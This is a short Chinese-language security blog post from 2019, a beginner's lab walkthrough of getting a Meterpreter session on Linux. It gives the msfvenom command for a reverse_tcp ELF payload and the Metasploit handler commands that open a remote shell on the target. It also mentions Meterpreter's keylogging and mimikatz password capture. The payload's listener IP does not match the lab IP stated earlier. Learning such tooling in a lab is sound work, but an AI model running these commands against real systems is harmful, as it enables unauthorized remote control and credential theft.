后渗透之meterpreter初体验

  1. 简介
  2. 获取一个meterpreter(Linux)
  3. Meterpreter基本命令

简介

Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。

获取一个meterpreter(Linux)

  • Kali:192.168.229.139
  • Ubuntu:192.168.229.135

首先用 msfvenom 生成一个反弹shell的木马

1
2
3
4
5
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444  -f elf -o shell

-p payload
-f 输出的格式
-o 输出的文件名

然后将生成的木马搞到我们的目标机器上(这里就直接搬过去了),放在了tmp目录下,一般这个目录下都会有可执行的权限,没有我们就(chmod +x shell)

然后我们打开msf控制台,使用我们的模块,并设定Payload和本地的ip:

1
2
3
4
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.229.139
exploit


然后我们在目标机器上运行我们的shell文件

这样就反弹成功啦~


可能会出现这样的问题,就是我们设定的端口被占用了,要关闭端口。

1
sudo fuser -k -n tcp 4444

Meterpreter基本命令

https://xz.aliyun.com/t/2536

meterpreter可以进行shell命令、提权、mimikatz抓取密码、屏幕截图、键盘记录等,挺方便的。后续再慢慢玩这些功能


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 sher10cksec@foxmail.com

文章标题:后渗透之meterpreter初体验

本文作者:sher10ck

发布时间:2019-10-14, 16:32:51

最后更新:2020-01-13, 12:50:15

原始链接:http://sherlocz.github.io/2019/10/14/后渗透之meterpreter初体验/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录